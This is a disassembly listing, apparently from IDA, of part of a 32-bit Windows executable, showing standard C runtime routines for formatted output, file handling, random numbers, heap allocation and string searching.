		push	ebx
		push	[ebp+arg_4]
		lea	eax, [ebp+var_20]
		push	eax
		mov	[ebp+var_1C], 7FFFFFFFh
		mov	[ebp+var_14], 42h
		call	sub_406D87
		add	esp, 10h
		dec	[ebp+var_1C]
		mov	esi, eax
		js	short loc_4034DE
		mov	eax, [ebp+var_20]
		mov	[eax], bl
		jmp	short loc_4034EA
; ---------------------------------------------------------------------------

loc_4034DE:				; CODE XREF: sub_403475+60j
		lea	eax, [ebp+var_20]
		push	eax
		push	ebx
		call	sub_406B86
		pop	ecx
		pop	ecx

loc_4034EA:				; CODE XREF: sub_403475+67j
		mov	eax, esi
		pop	esi

loc_4034ED:				; CODE XREF: sub_403475+29j
		pop	ebx
		leave
		retn
sub_403475	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4034F0	proc near		; CODE XREF: sub_4035B4+Ap

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	0Ch
		push	offset dword_421658
		call	__SEH_prolog4
		xor	ebx, ebx
		mov	[ebp+var_1C], ebx
		xor	eax, eax
		mov	edi, [ebp+arg_0]
		cmp	edi, ebx
		setnz	al
		cmp	eax, ebx
		jnz	short loc_40352B

loc_40350F:				; CODE XREF: sub_4034F0+47j
					; sub_4034F0+52j
		call	sub_405B83
		mov	dword ptr [eax], 16h
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4032F9
		add	esp, 14h

loc_403527:				; CODE XREF: sub_4034F0+6Bj
					; sub_4034F0+92j
		xor	eax, eax
		jmp	short loc_4035A4
; ---------------------------------------------------------------------------

loc_40352B:				; CODE XREF: sub_4034F0+1Dj
		xor	eax, eax
		mov	esi, [ebp+arg_4]
		cmp	esi, ebx
		setnz	al
		cmp	eax, ebx
		jz	short loc_40350F
		xor	eax, eax
		cmp	[esi], bl
		setnz	al
		cmp	eax, ebx
		jz	short loc_40350F
		call	sub_408851
		mov	[ebp+arg_0], eax
		cmp	eax, ebx
		jnz	short loc_40355D
		call	sub_405B83
		mov	dword ptr [eax], 18h
		jmp	short loc_403527
; ---------------------------------------------------------------------------

loc_40355D:				; CODE XREF: sub_4034F0+5Ej
		mov	[ebp+ms_exc.disabled], ebx
		cmp	[edi], bl
		jnz	short loc_403584
		call	sub_405B83
		mov	dword ptr [eax], 16h
		push	0FFFFFFFEh
		lea	eax, [ebp+ms_exc.prev_er]
		push	eax
		push	offset dword_423064
		call	sub_408978
		add	esp, 0Ch
		jmp	short loc_403527
; ---------------------------------------------------------------------------

loc_403584:				; CODE XREF: sub_4034F0+72j
		push	eax
		push	[ebp+arg_8]
		push	esi
		push	edi
		call	sub_4085AF
		add	esp, 10h
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_4035AA
		mov	eax, [ebp+var_1C]

loc_4035A4:				; CODE XREF: sub_4034F0+39j
		call	__SEH_epilog4
		retn
sub_4034F0	endp


; =============== S U B	R O U T	I N E =======================================



sub_4035AA	proc near		; CODE XREF: sub_4034F0+ACp
					; DATA XREF: _1fieagrn:00421670o
		push	dword ptr [ebp+8]
		call	sub_40855D
		pop	ecx
		retn
sub_4035AA	endp


; =============== S U B	R O U T	I N E =======================================



sub_4035B4	proc near		; CODE XREF: sub_4198AD+116p
					; sub_41B981+4Ep

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	40h
		push	[esp+4+arg_4]
		push	[esp+8+arg_0]
		call	sub_4034F0
		add	esp, 0Ch
		retn
sub_4035B4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4035C7	proc near		; CODE XREF: sub_4198AD+131p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= byte ptr  10h

		push	0Ch
		push	offset dword_421678
		call	__SEH_prolog4
		xor	ebx, ebx
		mov	[ebp+var_1C], ebx
		xor	eax, eax
		mov	esi, [ebp+arg_0]
		cmp	esi, ebx
		setnz	al
		cmp	eax, ebx
		jnz	short loc_403606

loc_4035E6:				; CODE XREF: sub_4035C7+49j
		call	sub_405B83
		mov	dword ptr [eax], 16h
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_403706
; ---------------------------------------------------------------------------

loc_403606:				; CODE XREF: sub_4035C7+1Dj
		xor	eax, eax
		cmp	[ebp+arg_4], ebx
		setnz	al
		cmp	eax, ebx
		jz	short loc_4035E6
		mov	[ebp+arg_0], esi
		push	esi
		call	sub_40850B
		pop	ecx
		mov	[ebp+ms_exc.disabled], ebx
		test	byte ptr [esi+0Ch], 40h
		jnz	loc_4036CF
		push	esi
		call	sub_408DD0
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jz	short loc_403663
		push	esi
		call	sub_408DD0
		pop	ecx
		cmp	eax, 0FFFFFFFEh
		jz	short loc_403663
		push	esi
		call	sub_408DD0
		sar	eax, 5
		lea	edi, ds:435300h[eax*4]
		push	esi
		call	sub_408DD0
		pop	ecx
		pop	ecx
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		jmp	short loc_403668
; ---------------------------------------------------------------------------

loc_403663:				; CODE XREF: sub_4035C7+6Cj
					; sub_4035C7+78j
		mov	eax, offset dword_423BD0

loc_403668:				; CODE XREF: sub_4035C7+9Aj
		test	byte ptr [eax+24h], 7Fh
		jnz	short loc_4036B3
		push	esi
		call	sub_408DD0
		pop	ecx
		cmp	eax, 0FFFFFFFFh
		jz	short loc_4036A8
		push	esi
		call	sub_408DD0
		pop	ecx
		cmp	eax, 0FFFFFFFEh
		jz	short loc_4036A8
		push	esi
		call	sub_408DD0
		sar	eax, 5
		lea	edi, ds:435300h[eax*4]
		push	esi
		call	sub_408DD0
		pop	ecx
		pop	ecx
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [edi]
		jmp	short loc_4036AD
; ---------------------------------------------------------------------------

loc_4036A8:				; CODE XREF: sub_4035C7+B1j
					; sub_4035C7+BDj
		mov	eax, offset dword_423BD0

loc_4036AD:				; CODE XREF: sub_4035C7+DFj
		test	byte ptr [eax+24h], 80h
		jz	short loc_4036CF

loc_4036B3:				; CODE XREF: sub_4035C7+A5j
		call	sub_405B83
		mov	dword ptr [eax], 16h
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4032F9
		add	esp, 14h
		or	[ebp+var_1C], 0FFFFFFFFh

loc_4036CF:				; CODE XREF: sub_4035C7+5Cj
					; sub_4035C7+EAj
		cmp	[ebp+var_1C], ebx
		jnz	short loc_4036F7
		push	esi
		call	sub_408ACB
		mov	edi, eax
		lea	eax, [ebp+arg_8]
		push	eax
		push	ebx
		push	[ebp+arg_4]
		push	esi
		call	sub_406D87
		mov	[ebp+var_1C], eax
		push	esi
		push	edi
		call	sub_408B61
		add	esp, 1Ch

loc_4036F7:				; CODE XREF: sub_4035C7+10Bj
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_40370C
		mov	eax, [ebp+var_1C]

loc_403706:				; CODE XREF: sub_4035C7+3Aj
		call	__SEH_epilog4
		retn
sub_4035C7	endp


; =============== S U B	R O U T	I N E =======================================



sub_40370C	proc near		; CODE XREF: sub_4035C7+137p
					; DATA XREF: _1fieagrn:00421690o
		push	dword ptr [ebp+8]
		call	sub_40855D
		pop	ecx
		retn
sub_40370C	endp


; =============== S U B	R O U T	I N E =======================================



sub_403716	proc near		; CODE XREF: sub_417C7B+4Fp
					; sub_41AFA7+20Fp

arg_0		= dword	ptr  4

		call	sub_40574D
		mov	ecx, [esp+arg_0]
		mov	[eax+14h], ecx
		retn
sub_403716	endp


; =============== S U B	R O U T	I N E =======================================



sub_403723	proc near		; CODE XREF: sub_417C7B:loc_417DF7p
					; sub_4198AD+A7p ...
		call	sub_40574D
		mov	ecx, [eax+14h]
		imul	ecx, 343FDh
		add	ecx, 269EC3h
		mov	[eax+14h], ecx
		mov	eax, ecx
		shr	eax, 10h
		and	eax, 7FFFh
		retn
sub_403723	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403745	proc near		; CODE XREF: sub_4037F6+12p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	ebx
		xor	ebx, ebx
		cmp	[ebp+arg_8], ebx
		jnz	short loc_403773
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	loc_4037F3
; ---------------------------------------------------------------------------

loc_403773:				; CODE XREF: sub_403745+Cj
		mov	ecx, [ebp+arg_4]
		cmp	ecx, ebx
		push	esi
		mov	esi, [ebp+arg_0]
		jz	short loc_40379F
		cmp	esi, ebx
		jnz	short loc_40379F
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_4037F2
; ---------------------------------------------------------------------------

loc_40379F:				; CODE XREF: sub_403745+37j
					; sub_403745+3Bj
		mov	eax, 7FFFFFFFh
		cmp	ecx, eax
		mov	[ebp+var_1C], eax
		ja	short loc_4037AE
		mov	[ebp+var_1C], ecx

loc_4037AE:				; CODE XREF: sub_403745+64j
		push	edi
		push	[ebp+arg_10]
		lea	eax, [ebp+var_20]
		push	[ebp+arg_C]
		mov	[ebp+var_14], 42h
		push	[ebp+arg_8]
		mov	[ebp+var_18], esi
		push	eax
		mov	[ebp+var_20], esi
		call	sub_406D87
		add	esp, 10h
		cmp	esi, ebx
		mov	edi, eax
		jz	short loc_4037F1
		dec	[ebp+var_1C]
		js	short loc_4037E3
		mov	eax, [ebp+var_20]
		mov	[eax], bl
		jmp	short loc_4037EF
; ---------------------------------------------------------------------------

loc_4037E3:				; CODE XREF: sub_403745+95j
		lea	eax, [ebp+var_20]
		push	eax
		push	ebx
		call	sub_406B86
		pop	ecx
		pop	ecx

loc_4037EF:				; CODE XREF: sub_403745+9Cj
		mov	eax, edi

loc_4037F1:				; CODE XREF: sub_403745+90j
		pop	edi

loc_4037F2:				; CODE XREF: sub_403745+58j
		pop	esi

loc_4037F3:				; CODE XREF: sub_403745+29j
		pop	ebx
		leave
		retn
sub_403745	endp


; =============== S U B	R O U T	I N E =======================================



sub_4037F6	proc near		; CODE XREF: sub_417ABC+3Ep
					; sub_417B51+7Cp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	[esp+arg_C]
		push	0
		push	[esp+8+arg_8]
		push	[esp+0Ch+arg_4]
		push	[esp+10h+arg_0]
		call	sub_403745
		add	esp, 14h
		retn
sub_4037F6	endp


; =============== S U B	R O U T	I N E =======================================



sub_403811	proc near		; CODE XREF: sub_403884+5Ap

arg_0		= dword	ptr  4

		push	ebx
		push	esi
		mov	esi, [esp+8+arg_0]
		push	edi
		xor	edi, edi
		or	ebx, 0FFFFFFFFh
		cmp	esi, edi
		jnz	short loc_40383E
		call	sub_405B83
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_403880
; ---------------------------------------------------------------------------

loc_40383E:				; CODE XREF: sub_403811+Ej
		test	byte ptr [esi+0Ch], 83h
		jz	short loc_40387B
		push	esi
		call	sub_408F8A
		push	esi
		mov	ebx, eax
		call	sub_408F5E
		push	esi
		call	sub_408DD0
		push	eax
		call	sub_408E91
		add	esp, 10h
		test	eax, eax
		jge	short loc_40386A
		or	ebx, 0FFFFFFFFh
		jmp	short loc_40387B
; ---------------------------------------------------------------------------

loc_40386A:				; CODE XREF: sub_403811+52j
		mov	eax, [esi+1Ch]
		cmp	eax, edi
		jz	short loc_40387B
		push	eax
		call	sub_4039C3
		pop	ecx
		mov	[esi+1Ch], edi

loc_40387B:				; CODE XREF: sub_403811+31j
					; sub_403811+57j ...
		mov	[esi+0Ch], edi
		mov	eax, ebx

loc_403880:				; CODE XREF: sub_403811+2Bj
		pop	edi
		pop	esi
		pop	ebx
		retn
sub_403811	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403884	proc near		; CODE XREF: sub_40E383+43p
					; sub_4198AD+137p ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_421698
		call	__SEH_prolog4
		or	[ebp+var_1C], 0FFFFFFFFh
		xor	eax, eax
		mov	esi, [ebp+arg_0]
		xor	edi, edi
		cmp	esi, edi
		setnz	al
		cmp	eax, edi
		jnz	short loc_4038C1
		call	sub_405B83
		mov	dword ptr [eax], 16h
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_4038CD
; ---------------------------------------------------------------------------

loc_4038C1:				; CODE XREF: sub_403884+1Ej
		test	byte ptr [esi+0Ch], 40h
		jz	short loc_4038D3
		mov	[esi+0Ch], edi

loc_4038CA:				; CODE XREF: sub_403884+6Fj
		mov	eax, [ebp+var_1C]

loc_4038CD:				; CODE XREF: sub_403884+3Bj
		call	__SEH_epilog4
		retn
; ---------------------------------------------------------------------------

loc_4038D3:				; CODE XREF: sub_403884+41j
		push	esi
		call	sub_40850B
		pop	ecx
		mov	[ebp+ms_exc.disabled], edi
		push	esi
		call	sub_403811
		pop	ecx
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_4038F8
		jmp	short loc_4038CA
sub_403884	endp


; =============== S U B	R O U T	I N E =======================================



sub_4038F5	proc near		; DATA XREF: _1fieagrn:004216B0o
		mov	esi, [ebp+8]
sub_4038F5	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4038F8	proc near		; CODE XREF: sub_403884+6Ap
		push	esi
		call	sub_40855D
		pop	ecx
		retn
sub_4038F8	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403900	proc near		; CODE XREF: .text:00419AB0p
					; sub_419AEB+13p

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		lea	eax, [ebp+var_8]
		push	eax
		call	ds:off_41D1A0
		mov	eax, [ebp+var_8]
		mov	ecx, [ebp+var_4]
		push	0
		add	eax, 2AC18000h
		push	989680h
		adc	ecx, 0FE624E21h
		push	ecx
		push	eax
		call	sub_409120
		mov	ecx, [ebp+arg_0]
		test	ecx, ecx
		jz	short locret_40393A
		mov	[ecx], eax
		mov	[ecx+4], edx

locret_40393A:				; CODE XREF: sub_403900+33j
		leave
		retn
sub_403900	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_40393C	proc near		; CODE XREF: sub_4039A4+15p

var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		push	edi
		push	esi
		call	sub_4044E0
		xor	edi, edi
		cmp	esi, edi
		pop	ecx
		jnz	short loc_40396D

loc_403950:				; CODE XREF: sub_40393C+34j
		call	sub_405B83
		push	edi
		push	edi
		push	edi
		push	edi
		push	edi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		or	eax, 0FFFFFFFFh
		jmp	short loc_4039A1
; ---------------------------------------------------------------------------

loc_40396D:				; CODE XREF: sub_40393C+12j
		cmp	[ebp+arg_4], edi
		jz	short loc_403950
		mov	ecx, 7FFFFFFFh
		cmp	eax, ecx
		mov	[ebp+var_14], 49h
		mov	[ebp+var_18], esi
		mov	[ebp+var_20], esi
		mov	[ebp+var_1C], ecx
		ja	short loc_40398E
		mov	[ebp+var_1C], eax

loc_40398E:				; CODE XREF: sub_40393C+4Dj
		push	[ebp+arg_C]
		lea	eax, [ebp+var_20]
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	eax
		call	[ebp+arg_0]
		add	esp, 10h

loc_4039A1:				; CODE XREF: sub_40393C+2Fj
		pop	edi
		leave
		retn
sub_40393C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4039A4	proc near		; CODE XREF: sub_4022D6+22Ep
					; sub_4022D6+36Bp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= byte ptr  0Ch

		push	esi
		mov	esi, [esp+4+arg_0]
		lea	eax, [esp+4+arg_8]
		push	eax
		push	0
		push	[esp+0Ch+arg_4]
		push	offset sub_409217
		call	sub_40393C
		add	esp, 10h
		pop	esi
		retn
sub_4039A4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4039C3	proc near		; CODE XREF: sub_40308A+Fp sub_40332Dj ...

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

; FUNCTION CHUNK AT 00403A22 SIZE 0000002F BYTES

		push	0Ch
		push	offset dword_4216B8
		call	__SEH_prolog4
		mov	esi, [ebp+arg_0]
		test	esi, esi
		jz	short loc_403A4B
		cmp	dword_436454, 3
		jnz	short loc_403A22
		push	4
		call	sub_405DA7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		push	esi
		call	sub_405ED5
		pop	ecx
		mov	[ebp+var_1C], eax
		test	eax, eax
		jz	short loc_403A02
		push	esi
		push	eax
		call	sub_405F00
		pop	ecx
		pop	ecx

loc_403A02:				; CODE XREF: sub_4039C3+34j
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_403A19
		cmp	[ebp+var_1C], 0
		jnz	short loc_403A4B
		push	[ebp+arg_0]
		jmp	short loc_403A23
sub_4039C3	endp


; =============== S U B	R O U T	I N E =======================================



sub_403A19	proc near		; CODE XREF: sub_4039C3+46p
					; DATA XREF: _1fieagrn:004216D0o
		push	4
		call	sub_405CCF
		pop	ecx
		retn
sub_403A19	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4039C3

loc_403A22:				; CODE XREF: sub_4039C3+1Aj
		push	esi

loc_403A23:				; CODE XREF: sub_4039C3+54j
		push	0
		push	dword_4275A8
		call	ds:dword_41D108	; RtlFreeHeap
		test	eax, eax
		jnz	short loc_403A4B
		call	sub_405B83
		mov	esi, eax
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		push	eax
		call	sub_405B48
		mov	[esi], eax
		pop	ecx

loc_403A4B:				; CODE XREF: sub_4039C3+11j
					; sub_4039C3+4Fj ...
		call	__SEH_epilog4
		retn
; END OF FUNCTION CHUNK	FOR sub_4039C3

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_403A51	proc near		; CODE XREF: sub_403AA0+59p

var_1C		= dword	ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h
arg_0		= dword	ptr  8

		push	0Ch
		push	offset dword_4216D8
		call	__SEH_prolog4
		and	[ebp+var_1C], 0
		mov	esi, [ebp+arg_0]
		cmp	esi, dword_436444
		ja	short loc_403A8E
		push	4
		call	sub_405DA7
		pop	ecx
		and	[ebp+ms_exc.disabled], 0
		push	esi
		call	sub_4066A9
		pop	ecx
		mov	[ebp+var_1C], eax
		mov	[ebp+ms_exc.disabled], 0FFFFFFFEh
		call	sub_403A97

loc_403A8E:				; CODE XREF: sub_403A51+19j
		mov	eax, [ebp+var_1C]
		call	__SEH_epilog4
		retn
sub_403A51	endp


; =============== S U B	R O U T	I N E =======================================



sub_403A97	proc near		; CODE XREF: sub_403A51+38p
					; DATA XREF: _1fieagrn:004216F0o
		push	4
		call	sub_405CCF
		pop	ecx
		retn
sub_403A97	endp


; =============== S U B	R O U T	I N E =======================================



sub_403AA0	proc near		; CODE XREF: sub_402FCC+1Fp
					; sub_403032+2Ap ...

arg_0		= dword	ptr  4

		push	ebp
		mov	ebp, [esp+4+arg_0]
		cmp	ebp, 0FFFFFFE0h
		ja	loc_403B4D
		push	ebx
		mov	ebx, ds:dword_41D110
		push	esi
		push	edi

loc_403AB7:				; CODE XREF: sub_403AA0+94j
		xor	esi, esi
		cmp	dword_4275A8, esi
		mov	edi, ebp
		jnz	short loc_403ADB
		call	sub_40A004
		push	1Eh
		call	sub_409E64
		push	0FFh
		call	sub_407C57
		pop	ecx
		pop	ecx

loc_403ADB:				; CODE XREF: sub_403AA0+21j
		mov	eax, dword_436454
		cmp	eax, 1
		jnz	short loc_403AF3
		cmp	ebp, esi
		jz	short loc_403AED
		mov	eax, ebp
		jmp	short loc_403AF0
; ---------------------------------------------------------------------------

loc_403AED:				; CODE XREF: sub_403AA0+47j
		xor	eax, eax
		inc	eax

loc_403AF0:				; CODE XREF: sub_403AA0+4Bj
		push	eax
		jmp	short loc_403B11
; ---------------------------------------------------------------------------

loc_403AF3:				; CODE XREF: sub_403AA0+43j
		cmp	eax, 3
		jnz	short loc_403B03
		push	ebp
		call	sub_403A51
		cmp	eax, esi
		pop	ecx
		jnz	short loc_403B1A

loc_403B03:				; CODE XREF: sub_403AA0+56j
		cmp	ebp, esi
		jnz	short loc_403B0A
		xor	edi, edi
		inc	edi

loc_403B0A:				; CODE XREF: sub_403AA0+65j
		add	edi, 0Fh
		and	edi, 0FFFFFFF0h
		push	edi

loc_403B11:				; CODE XREF: sub_403AA0+51j
		push	esi
		push	dword_4275A8
		call	ebx	; RtlAllocateHeap

loc_403B1A:				; CODE XREF: sub_403AA0+61j
		mov	esi, eax
		test	esi, esi
		jnz	short loc_403B46
		cmp	dword_42792C, eax
		push	0Ch
		pop	edi
		jz	short loc_403B38
		push	ebp
		call	sub_408412
		test	eax, eax
		pop	ecx
		jnz	short loc_403AB7
		jmp	short loc_403B3F
; ---------------------------------------------------------------------------

loc_403B38:				; CODE XREF: sub_403AA0+89j
		call	sub_405B83
		mov	[eax], edi

loc_403B3F:				; CODE XREF: sub_403AA0+96j
		call	sub_405B83
		mov	[eax], edi

loc_403B46:				; CODE XREF: sub_403AA0+7Ej
		pop	edi
		mov	eax, esi
		pop	esi
		pop	ebx
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_403B4D:				; CODE XREF: sub_403AA0+8j
		push	ebp
		call	sub_408412
		pop	ecx
		call	sub_405B83
		mov	dword ptr [eax], 0Ch
		xor	eax, eax
		pop	ebp
		retn
sub_403AA0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_403B70	proc near		; CODE XREF: sub_41802D+84p
					; sub_418CAF+1Bp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	ecx, [esp+arg_4]
		push	edi
		push	ebx
		push	esi
		mov	dl, [ecx]
		mov	edi, [esp+0Ch+arg_0]
		test	dl, dl
		jz	short loc_403BF0
		mov	dh, [ecx+1]
		test	dh, dh
		jz	short loc_403BDD

loc_403B88:				; CODE XREF: sub_403B70+58j
					; sub_403B70+6Bj
		mov	esi, edi
		mov	ecx, [esp+0Ch+arg_4]
		mov	al, [edi]
		add	esi, 1
		cmp	al, dl
		jz	short loc_403BAE
		test	al, al
		jz	short loc_403BA8

loc_403B9B:				; CODE XREF: sub_403B70+36j
		mov	al, [esi]
		add	esi, 1

loc_403BA0:				; CODE XREF: sub_403B70+45j
		cmp	al, dl
		jz	short loc_403BAE
		test	al, al
		jnz	short loc_403B9B

loc_403BA8:				; CODE XREF: sub_403B70+29j
		pop	esi
		pop	ebx
		pop	edi
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_403BAE:				; CODE XREF: sub_403B70+25j
					; sub_403B70+32j
		mov	al, [esi]
		add	esi, 1
		cmp	al, dh
		jnz	short loc_403BA0
		lea	edi, [esi-1]

loc_403BBA:				; CODE XREF: sub_403B70+69j
		mov	ah, [ecx+2]
		test	ah, ah
		jz	short loc_403BE9
		mov	al, [esi]
		add	esi, 2
		cmp	al, ah
		jnz	short loc_403B88
		mov	al, [ecx+3]
		test	al, al
		jz	short loc_403BE9
		mov	ah, [esi-1]
		add	ecx, 2
		cmp	al, ah
		jz	short loc_403BBA
		jmp	short loc_403B88
; ---------------------------------------------------------------------------

loc_403BDD:				; CODE XREF: sub_403B70+16j
		xor	eax, eax
		pop	esi
		pop	ebx
		pop	edi
		mov	al, dl
		jmp	loc_403C16
; ---------------------------------------------------------------------------

loc_403BE9:				; CODE XREF: sub_403B70+4Fj
					; sub_403B70+5Fj
		lea	eax, [edi-1]
		pop	esi
		pop	ebx
		pop	edi
		retn
; ---------------------------------------------------------------------------

loc_403BF0:				; CODE XREF: sub_403B70+Fj
		mov	eax, edi
		pop	esi
		pop	ebx
		pop	edi
		retn
sub_403B70	endp

; ---------------------------------------------------------------------------
		align 10h
; START	OF FUNCTION CHUNK FOR sub_403C10

loc_403C00:				; CODE XREF: sub_403C10+1Fj
		lea	eax, [edx-1]
		pop	ebx
		retn
; END OF FUNCTION CHUNK	FOR sub_403C10
; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_403C10	proc near		; CODE XREF: sub_418B6F+Bp
					; sub_418B86+35p ...

arg_0		= dword	ptr  4
arg_4		= byte ptr  8

; FUNCTION CHUNK AT 00403C00 SIZE 00000005 BYTES

		xor	eax, eax
		mov	al, [esp+arg_4]

loc_403C16:				; CODE XREF: sub_403B70+74j
		push	ebx
		mov	ebx, eax
		shl	eax, 8
		mov	edx, [esp+4+arg_0]
		test	edx, 3
		jz	short loc_403C3D

loc_403C28:				; CODE XREF: sub_403C10+2Bj
		mov	cl, [edx]
		add	edx, 1
		cmp	cl, bl
		jz	short loc_403C00
		test	cl, cl
		jz	short loc_403C86
		test	edx, 3
		jnz	short loc_403C28

loc_403C3D:				; CODE XREF: sub_403C10+16j
		or	ebx, eax
		push	edi
		mov	eax, ebx
		shl	ebx, 10h
		push	esi
		or	ebx, eax

loc_403C48:				; CODE XREF: sub_403C10+63j
					; sub_403C10+72j ...
		mov	ecx, [edx]
		mov	edi, 7EFEFEFFh
		mov	eax, ecx
		mov	esi, edi
		xor	ecx, ebx
		add	esi, eax
		add	edi, ecx
		xor	ecx, 0FFFFFFFFh
		xor	eax, 0FFFFFFFFh
		xor	ecx, edi
		xor	eax, esi
		add	edx, 4
		and	ecx, 81010100h
		jnz	short loc_403C8A
		and	eax, 81010100h
		jz	short loc_403C48
		and	eax, 1010100h
		jnz	short loc_403C84
		and	esi, 80000000h
		jnz	short loc_403C48

loc_403C84:				; CODE XREF: sub_403C10+6Aj
					; sub_403C10+83j ...
		pop	esi
		pop	edi

loc_403C86:				; CODE XREF: sub_403C10+23j
		pop	ebx
		xor	eax, eax
		retn
; ---------------------------------------------------------------------------

loc_403C8A:				; CODE XREF: sub_403C10+5Cj
		mov	eax, [edx-4]
		cmp	al, bl
		jz	short loc_403CC7
		test	al, al
		jz	short loc_403C84
		cmp	ah, bl
		jz	short loc_403CC0
		test	ah, ah
		jz	short loc_403C84
		shr	eax, 10h
		cmp	al, bl
		jz	short loc_403CB9
		test	al, al
		jz	short loc_403C84
		cmp	ah, bl
		jz	short loc_403CB2
		test	ah, ah
		jz	short loc_403C84
		jmp	short loc_403C48
; ---------------------------------------------------------------------------

loc_403CB2:				; CODE XREF: sub_403C10+9Aj
		pop	esi
		pop	edi
		lea	eax, [edx-1]
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_403CB9:				; CODE XREF: sub_403C10+92j
		lea	eax, [edx-2]
		pop	esi
		pop	edi
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_403CC0:				; CODE XREF: sub_403C10+87j
		lea	eax, [edx-3]
		pop	esi
		pop	edi
		pop	ebx
		retn
; ---------------------------------------------------------------------------

loc_403CC7:				; CODE XREF: sub_403C10+7Fj
		lea	eax, [edx-4]
		pop	esi
		pop	edi
		pop	ebx
		retn
sub_403C10	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_403CD0	proc near		; CODE XREF: sub_417E66+104p
					; sub_41802D+D9p ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		mov	ecx, [esp+arg_8]
		push	edi
		test	ecx, ecx
		jz	loc_403D6F
		push	esi
		push	ebx
		mov	ebx, ecx
		mov	esi, [esp+0Ch+arg_4]
		test	esi, 3
		mov	edi, [esp+0Ch+arg_0]
		jnz	short loc_403CFC
		shr	ecx, 2
		jnz	loc_403D7F
		jmp	short loc_403D23
; ---------------------------------------------------------------------------

loc_403CFC:				; CODE XREF: sub_403CD0+1Fj
					; sub_403CD0+45j
		mov	al, [esi]
		add	esi, 1
		mov	[edi], al
		add	edi, 1
		sub	ecx, 1
		jz	short loc_403D36
		test	al, al
		jz	short loc_403D3E
		test	esi, 3
		jnz	short loc_403CFC
		mov	ebx, ecx
		shr	ecx, 2
		jnz	short loc_403D7F

